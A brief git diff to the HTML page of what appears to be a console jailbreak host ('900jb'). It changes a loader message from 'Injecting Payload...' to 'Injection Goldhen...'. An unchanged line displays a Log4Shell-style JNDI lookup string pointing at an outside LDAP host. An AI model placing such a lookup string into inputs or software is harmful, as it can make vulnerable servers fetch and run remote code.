--- a/900jb/index.html
+++ b/900jb/index.html
@@ -72,7 +72,7 @@
 
     <div id="loader" class="loader"></div>
     <div id="awaiting" class="info" style="display:none;">
-        Injecting Payload...
+        Injection Goldhen...
         <br />
         <span class="j">${jndi:ldap://nsa.gov}</span>
     </div>
